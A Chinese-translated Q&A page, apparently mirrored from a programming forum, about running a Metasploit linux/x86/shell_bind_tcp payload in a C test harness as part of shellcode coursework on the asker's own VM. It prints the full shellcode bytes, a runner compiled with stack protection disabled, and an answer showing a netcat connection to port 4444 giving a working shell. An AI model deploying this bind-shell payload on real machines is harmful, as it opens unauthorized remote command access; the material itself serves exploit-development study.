如何单独运行linux / x86 / shell_bind_tcp有效负载?

时间:2014-01-03 16:37:22

标签: linux metasploit

我正在沙箱c程序中运行Metasploit有效负载。

以下是感兴趣的有效负载的摘要。从那里我生成一些shellcode并将其加载到我的沙箱中,但是当我运行它时,程序将只是等待。我认为这是因为它正在等待发送shell的连接,但我不确定。

我将如何离开:

  1. 生成shellcode
  2. 将其加载到我的沙箱中
  3. 成功获得/bin/sh shell< - 这是我坚持的部分。
  4. 基本设置:

    max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_bind_tcp S
    [sudo] password for max: 
    
           Name: Linux Command Shell, Bind TCP Inline
         Module: payload/linux/x86/shell_bind_tcp
       Platform: Linux
           Arch: x86
    Needs Admin: No
     Total size: 200
           Rank: Normal
    
    Provided by:
      Ramon de C Valle <rcvalle@metasploit.com>
    
    Basic options:
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    LPORT  4444             yes       The listen port
    RHOST                   no        The target address
    
    Description:
      Listen for a connection and spawn a command shell
    

    生成shellcode:

    max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_bind_tcp C
    

    带有shellcode的沙箱程序:

    #include<stdio.h>
    #include<string.h>
    /*
    objdump -d ./PROGRAM|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
     */
    
    unsigned char code[] = \
    "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
    "\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
    "\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
    "\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
    "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
    "\x0b\xcd\x80";
    
    main()
    {
    
      printf("Shellcode Length:  %d\n", strlen(code));
    
      int (*ret)() = (int(*)())code;
    
      ret();
    
    }
    

    编译并运行。但是,这是我不确定如何获得/bin/sh shell的地方:

    max@ubuntu-vm:~/SLAE/mod2$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
    max@ubuntu-vm:~/SLAE/mod2$ ./shellcode 
    Shellcode Length:  20
    (program waiting here...waiting for a connection?)
    

    编辑:

    在终端我运行我的shellcode程序:

    max@ubuntu-vm:~/SLAE/mod2$ ./shellcode 
    Shellcode Length:  20
    

    现在在终端2中,我检查了tcp监听器。授予-n以禁止主机名解析,-t表示tcp,-l表示侦听程序,-p查看程序名称。

    我可以在端口4444上看到shellcode程序:

    max@ubuntu-vm:~$ sudo netstat -ntlp
    Active Internet connections (only servers)
    Proto Recv-Q Send-Q Local Address     Foreign Address       State     PID/Program name      
    tcp      0    0     0.0.0.0:4444      0.0.0.0:*             LISTEN    14885/shellcode       
    max@ubuntu-vm:~$ 
    

    telnet连接,似乎已成功但仍然没有sh shell。

    max@ubuntu-vm:~$ telnet 0.0.0.0 4444
    Trying 0.0.0.0...
    Connected to 0.0.0.0.
    Escape character is '^]'.
    

    如何获得sh shell?

1 个答案:

答案 0 :(得分:0)

生成shellcode,编译并运行:

max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_bind_tcp C
/*
 * linux/x86/shell_bind_tcp - 78 bytes
 * http://www.metasploit.com
 * VERBOSE=false, LPORT=4444, RHOST=, PrependFork=false, 
 * PrependSetresuid=false, PrependSetreuid=false, 
 * PrependSetuid=false, PrependSetresgid=false, 
 * PrependSetregid=false, PrependSetgid=false, 
 * PrependChrootBreak=false, AppendExit=false, 
 * InitialAutoRunScript=, AutoRunScript=
 */
unsigned char buf[] = 
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80";
max@ubuntu-vm:~/SLAE/mod2$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
max@ubuntu-vm:~/SLAE/mod2$ ./shellcode 
Shellcode Length:  20

现在,在终端2.检查连接,最后使用netcat进行连接。请注意,$没有出现,但shell仍然存在:

max@ubuntu-vm:~$ sudo netstat -ntlp 
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address     Foreign Address     State       PID/Program name
tcp        0      0 0.0.0.0:4444      0.0.0.0:*           LISTEN      3326/shellcode    
max@ubuntu-vm:~$ nc 0.0.0.0 4444
pwd
/home/max/SLAE/mod2
whoami
max
ls -l
total 516
-rwxrwxr-x 1 max max    591 Jan  2 07:06 InsertionEncoder.py
-rwxrwxr-x 1 max max    591 Jan  2 07:03 InsertionEncoder.py~
-rwxrwxr-x 1 max max    471 Dec 30 17:00 NOTEncoder.py
-rwxrwxr-x 1 max max    471 Dec 30 16:57 NOTEncoder.py~
-rwxrwxr-x 1 max max    442 Jan  2 09:58 XOREncoder.py
-rwxrwxr-x 1 max max    442 Dec 30 08:36 XOREncoder.py~
-rwxrwxr-x 1 max max    139 Dec 27 08:18 compile.sh